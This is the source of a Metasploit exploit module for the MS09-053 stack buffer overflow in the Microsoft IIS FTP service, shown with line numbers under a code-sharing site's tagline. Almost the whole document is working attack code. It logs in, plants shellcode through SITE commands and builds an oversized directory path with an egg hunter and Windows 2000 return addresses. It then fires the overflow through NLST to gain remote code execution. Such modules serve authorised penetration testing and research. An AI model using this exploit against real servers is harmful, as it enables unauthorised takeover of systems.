Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::Ftp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'MS09-053 Microsoft IIS FTP Server NLST Response Overflow',
14
      'Description'    => %q{
15
          This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP
16
        service. The flaw is triggered when a special NLST argument is passed
17
        while the session has changed into a long directory path. For this exploit
18
        to work, the FTP server must be configured to allow write access to the
19
        file system (either anonymously or in conjunction with a real account)
20
      },
21
      'Author'         => [ 'Kingcope <kcope2[at]googlemail.com>', 'hdm' ],
22
      'License'        => MSF_LICENSE,
23
      'References'     =>
24
        [
25
          ['EDB', '9541'],
26
          ['CVE', '2009-3023'],
27
          ['OSVDB', '57589'],
28
          ['BID', '36189'],
29
          ['MSB', 'MS09-053'],
30
        ],
31
      'DefaultOptions' =>
32
        {
33
          'EXITFUNC' => 'process',
34
        },
35
      'Privileged'     => true,
36
      'Payload'        =>
37
        {
38
          'Space'    => 490,
39
          'BadChars' => "\x00\x09\x0c\x20\x0a\x0d\x0b",
40
          # This is for the stored payload, the real BadChar list for file paths is:
41
          # \x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x22\x2a\x2e\x2f\x3a\x3c\x3e\x3f\x5c\x7c
42
          'StackAdjustment' => -3500,
43
        },
44
      'Platform'       => [ 'win' ],
45
      'Targets'        =>
46
        [
47
          [
48
            'Windows 2000 SP4 English/Italian (IIS 5.0)',
49
            {
50
              'Ret'      => 0x773d24eb,  # jmp esp in activeds.dll (English / 5.0.2195.6601)
51
              'Patch'    => 0x7ffd7ffd   # works for off-by-two alignment
52
            },
53
          ],
54
          [
55
            'Windows 2000 SP3 English (IIS 5.0)',
56
            {
57
              'Ret'      => 0x77e42ed8,  # jmp esp in user32.dll (English / 5.0.2195.7032)
58
              'Patch'    => 0x7ffd7ffd   # works for off-by-two alignment
59
            },
60
          ],
61
          [
62
            # target from TomokiSanaki
63
            'Windows 2000 SP0-SP3 Japanese (IIS 5.0)',
64
            {
65
              'Ret'      => 0x774fa593,  # jmp esp in ?? (Japanese)
66
              'Patch'    => 0x7ffd7ffd   # works for off-by-two alignment
67
            },
68
          ],
69
        ],
70
      'DisclosureDate' => '2009-08-31',
71
      'DefaultTarget' => 0))
72

73
    register_options([Opt::RPORT(21),])
74
  end
75

76

77
  def exploit
78
    connect_login
79

80

81
    based = rand_text_alpha_upper(10)
82

83
    res   = send_cmd( ['MKD', based ], true )
84
    print_status(res.strip)
85

86
    if (res !~ /directory created/)
87
      print_error("The root directory of the FTP server is not writeable")
88
      disconnect
89
      return
90
    end
91

92
    res   = send_cmd( ['CWD', based ], true )
93
    print_status(res.strip)
94

95
    egg = rand_text_alpha_upper(4)
96
    hun = "\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38#{egg}\x75\xF7\x40\x40\x40\x40\xFF\xE0"
97

98
    # This egg hunter is necessary because of the huge set of restricted characters for directory names
99
    # The best that metasploit could so was 133 bytes for an alphanum encoded egg hunter
100
    # The egg hunter above was written by kcope and searches from 0x70000 forward (stack) in order
101
    # to locate the real shellcode. The only change from the original hunter was to randomize the
102
    # prefix used.
103

104
    # Store our real shellcode on the stack
105
    1.upto(5) do
106
      res = send_cmd( ['SITE', egg + payload.encoded.gsub("\xff", "\xff\xff") ], true )
107
    end
108

109
    # Create the directory path that will be used in the overflow
110
    pre = rand_text_alpha_upper(3)              # esp+0x28 points here
111
    pst = rand_text_alpha_upper(210)            # limited by max path
112

113
    pst[  0, hun.length]  = hun                 # egg hunter
114
    pst[ 90,  4]  = [target['Patch']].pack('V') # patch smashed pointers
115
    pst[ 94,  4]  = [target['Patch']].pack('V')	# patch smashed pointers
116
    pst[140, 32]  = [target['Patch']].pack('V') * 8  # patch smashed pointers
117
    pst[158,  4]  = [target.ret].pack("V")      # return
118
    pst[182,  5]  = "\xe9" + [-410].pack("V")   # jmp back
119

120
    # Escape each 0xff with another 0xff for FTP
121
    pst = pst.gsub("\xff", "\xff\xff")
122

123
    print_status("Creating long directory...")
124
    res   = send_cmd( ['MKD', pre+pst ], true )
125
    print_status(res.strip)
126

127
    srv	  = Rex::Socket::TcpServer.create(
128
      'LocalHost' => '0.0.0.0',
129
      'LocalPort' =>  0,
130
      'SSL'       => false,
131
      'Context'   => {
132
          'Msf'        => framework,
133
          'MsfExploit' => self,
134
      }
135
    )
136

137
    add_socket(srv)
138

139
    begin
140

141
    thr = framework.threads.spawn("Module(#{self.refname})-Listener", false) { srv.accept }
142

143
      prt   = srv.getsockname[2]
144
      prt1  = prt / 256
145
      prt2  = prt % 256
146

147
      addr  = Rex::Socket.source_address(rhost).gsub(".", ",") + ",#{prt1},#{prt2}"
148

149
      res   = send_cmd( ['PORT', addr ], true )
150
      print_status(res.strip)
151

152
      print_status("Trying target #{target.name}...")
153

154
      res   = send_cmd( ['NLST', pre+pst + "*/../" + pre + "*/"], true )
155
      print_status(res.strip) if res
156

157
      select(nil,nil,nil,2)
158

159
      handler
160
      disconnect
161

162
    ensure
163
      thr.kill
164
      srv.close
165

166
    end
167
  end
168
end
169

170